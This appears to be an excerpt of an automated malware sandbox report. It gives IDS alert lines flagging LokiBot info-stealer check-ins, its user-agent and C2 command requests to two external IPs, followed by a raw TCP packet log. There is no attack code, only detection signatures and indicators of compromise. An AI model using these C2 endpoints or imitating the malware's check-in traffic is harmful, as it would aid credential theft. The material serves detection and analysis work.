192.168.2.3188.114.96.749851802825766 06/09/22-12:20:29.327641	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49851	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749786802025381 06/09/22-12:19:44.361044	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749839802825766 06/09/22-12:20:25.206676	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49839	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749797802021641 06/09/22-12:19:56.597737	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749794802024313 06/09/22-12:19:52.723950	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749769802021641 06/09/22-12:19:11.569140	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749803802024313 06/09/22-12:20:05.555366	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749782802021641 06/09/22-12:19:30.781711	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749810802021641 06/09/22-12:20:16.253890	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649824802021641 06/09/22-12:20:22.688767	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49824	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749805802825766 06/09/22-12:20:10.598374	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49805	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749770802025381 06/09/22-12:19:14.041674	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749761802025381 06/09/22-12:18:59.590864	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749769802825766 06/09/22-12:19:11.569140	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49769	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749793802024313 06/09/22-12:19:50.509118	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649824802825766 06/09/22-12:20:22.688767	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49824	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649771802025381 06/09/22-12:19:17.236324	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649776802024313 06/09/22-12:19:23.957128	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749819802025381 06/09/22-12:20:19.468606	TCP	2025381	ET TROJAN LokiBot Checkin	49819	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749839802021641 06/09/22-12:20:25.206676	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49839	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749752802024313 06/09/22-12:18:54.883061	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749779802021641 06/09/22-12:19:28.006927	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749804802024313 06/09/22-12:20:07.542975	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649764802021641 06/09/22-12:19:02.212367	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749798802021641 06/09/22-12:19:58.002191	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649776802825766 06/09/22-12:19:23.957128	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49776	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749777802025381 06/09/22-12:19:25.204896	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649775802024313 06/09/22-12:19:22.604146	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649792802021641 06/09/22-12:19:45.858683	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749785802825766 06/09/22-12:19:42.634597	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49785	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649751802825766 06/09/22-12:18:53.097950	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749794802825766 06/09/22-12:19:52.723950	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49794	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649820802024313 06/09/22-12:20:20.867617	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49820	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749779802825766 06/09/22-12:19:28.006927	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49779	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.749765802025381 06/09/22-12:19:04.748877	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.3	188.114.97.7
192.168.2.3188.114.96.749817802021641 06/09/22-12:20:18.206399	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749748802025381 06/09/22-12:18:50.155870	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749851802024313 06/09/22-12:20:29.327641	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49851	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649801802024313 06/09/22-12:20:02.469935	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649768802025381 06/09/22-12:19:10.383861	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749766802825766 06/09/22-12:19:06.967493	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49766	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749773802025381 06/09/22-12:19:20.082461	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749772802825766 06/09/22-12:19:18.470177	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49772	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749767802025381 06/09/22-12:19:08.800960	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749807802024313 06/09/22-12:20:13.436189	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749784802024313 06/09/22-12:19:39.004620	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649792802825766 06/09/22-12:19:45.858683	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49792	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749832802024313 06/09/22-12:20:23.981118	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749766802021641 06/09/22-12:19:06.967493	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749745802025381 06/09/22-12:18:46.752225	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749772802021641 06/09/22-12:19:18.470177	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.3	188.114.96.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2022 12:18:46.722642899 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.739614964 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:46.739777088 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.752224922 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.769190073 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:46.769325018 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.786222935 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:46.913125038 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:46.913345098 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.917885065 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:46.918070078 CEST	49745	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:46.930108070 CEST	80	49745	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.126954079 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:50.143925905 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.144165039 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:50.155869961 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:50.172988892 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.173213959 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:50.190064907 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.320050955 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.320457935 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:50.337321043 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.541769028 CEST	80	49748	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:50.541960001 CEST	49748	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:53.077223063 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.094029903 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:53.094158888 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.097949982 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.114700079 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:53.114986897 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.131730080 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:53.248898029 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:53.249108076 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.250098944 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:53.250163078 CEST	49751	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:18:53.265929937 CEST	80	49751	188.114.97.6	192.168.2.3
Jun 9, 2022 12:18:54.853734970 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:54.871198893 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:54.871303082 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:54.883060932 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:54.900161028 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:54.900248051 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:54.917493105 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:55.062665939 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:55.062786102 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:55.079822063 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:55.283999920 CEST	80	49752	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:55.284086943 CEST	49752	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.570873022 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.588036060 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:59.588152885 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.590863943 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.607566118 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:59.607702017 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.624660015 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:59.765675068 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:59.765849113 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.775964022 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:18:59.776042938 CEST	49761	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:18:59.782598019 CEST	80	49761	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:02.176585913 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.193496943 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:02.196374893 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.212367058 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.229312897 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:02.229402065 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.246309042 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:02.588592052 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:02.590812922 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:02.590919971 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.591222048 CEST	49764	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:02.607995987 CEST	80	49764	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:04.727431059 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.744517088 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:04.744724035 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.748877048 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.765814066 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:04.765901089 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.782810926 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:04.892672062 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:04.892708063 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:04.892796993 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.892842054 CEST	49765	80	192.168.2.3	188.114.97.7
Jun 9, 2022 12:19:04.909717083 CEST	80	49765	188.114.97.7	192.168.2.3
Jun 9, 2022 12:19:06.939806938 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:06.956624985 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:06.956788063 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:06.967493057 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:06.984337091 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:06.984461069 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:07.001257896 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:07.076062918 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:07.076317072 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:07.078284979 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:07.078403950 CEST	49766	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:07.093228102 CEST	80	49766	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.770730019 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.787811041 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.787977934 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.800960064 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.817998886 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.819365978 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.836330891 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.912668943 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.912826061 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.915999889 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:08.916122913 CEST	49767	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:08.929964066 CEST	80	49767	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:10.361852884 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.379029989 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:10.379163027 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.383861065 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.401034117 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:10.401235104 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.418576956 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:10.548271894 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:10.548470974 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.553881884 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:10.553976059 CEST	49768	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:10.565515995 CEST	80	49768	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:11.542246103 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.559205055 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:11.559344053 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.569139957 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.585979939 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:11.588557005 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.605528116 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:11.716733932 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:11.716979980 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.718008041 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:11.718101025 CEST	49769	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:11.733890057 CEST	80	49769	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.021713972 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:14.038721085 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.038820982 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:14.041673899 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:14.058566093 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.058743954 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:14.075639963 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.153940916 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.183177948 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:14.200035095 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.376456976 CEST	80	49770	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:14.376646042 CEST	49770	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:17.214972973 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.232867002 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:17.232964039 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.236324072 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.253494024 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:17.253592014 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.270687103 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:17.360335112 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:17.360383987 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:17.360644102 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.360683918 CEST	49771	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:17.377933025 CEST	80	49771	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:18.443608999 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.460721016 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:18.460871935 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.470176935 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.487611055 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:18.487781048 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.504848957 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:18.584544897 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:18.584706068 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.592962980 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:18.593053102 CEST	49772	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:18.601775885 CEST	80	49772	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.061490059 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.078824043 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.078934908 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.082461119 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.101676941 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.101741076 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.120584965 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.237472057 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.237507105 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:20.237606049 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.237675905 CEST	49773	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:20.255795002 CEST	80	49773	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.453573942 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.470484018 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.470609903 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.474098921 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.490910053 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.490986109 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.507762909 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.592752934 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.592957020 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.598436117 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:21.598588943 CEST	49774	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:21.609750986 CEST	80	49774	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:22.580971003 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.601336956 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:22.601501942 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.604146004 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.620934010 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:22.621094942 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.637943029 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:22.945173979 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:22.945430040 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.949002028 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:22.949074030 CEST	49775	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:22.962268114 CEST	80	49775	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:23.934212923 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:23.951124907 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:23.952655077 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:23.957128048 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:23.974138021 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:23.974256992 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:23.991144896 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:24.182347059 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:24.182523012 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:24.199412107 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:24.405680895 CEST	80	49776	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:24.406487942 CEST	49776	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:25.163582087 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.198369980 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:25.198616982 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.204895973 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.222054958 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:25.222219944 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.239320040 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:25.556766987 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:25.556876898 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.560843945 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:25.560933113 CEST	49777	80	192.168.2.3	188.114.96.7
Jun 9, 2022 12:19:25.573885918 CEST	80	49777	188.114.96.7	192.168.2.3
Jun 9, 2022 12:19:26.704847097 CEST	49778	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:26.722086906 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:26.722201109 CEST	49778	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:26.733757973 CEST	49778	80	192.168.2.3	188.114.97.6
Jun 9, 2022 12:19:26.751036882 CEST	80	49778	188.114.97.6	192.168.2.3
Jun 9, 2022 12:19:26.751442909 CEST	49778	80	192.168.2.3	188.114.97.6
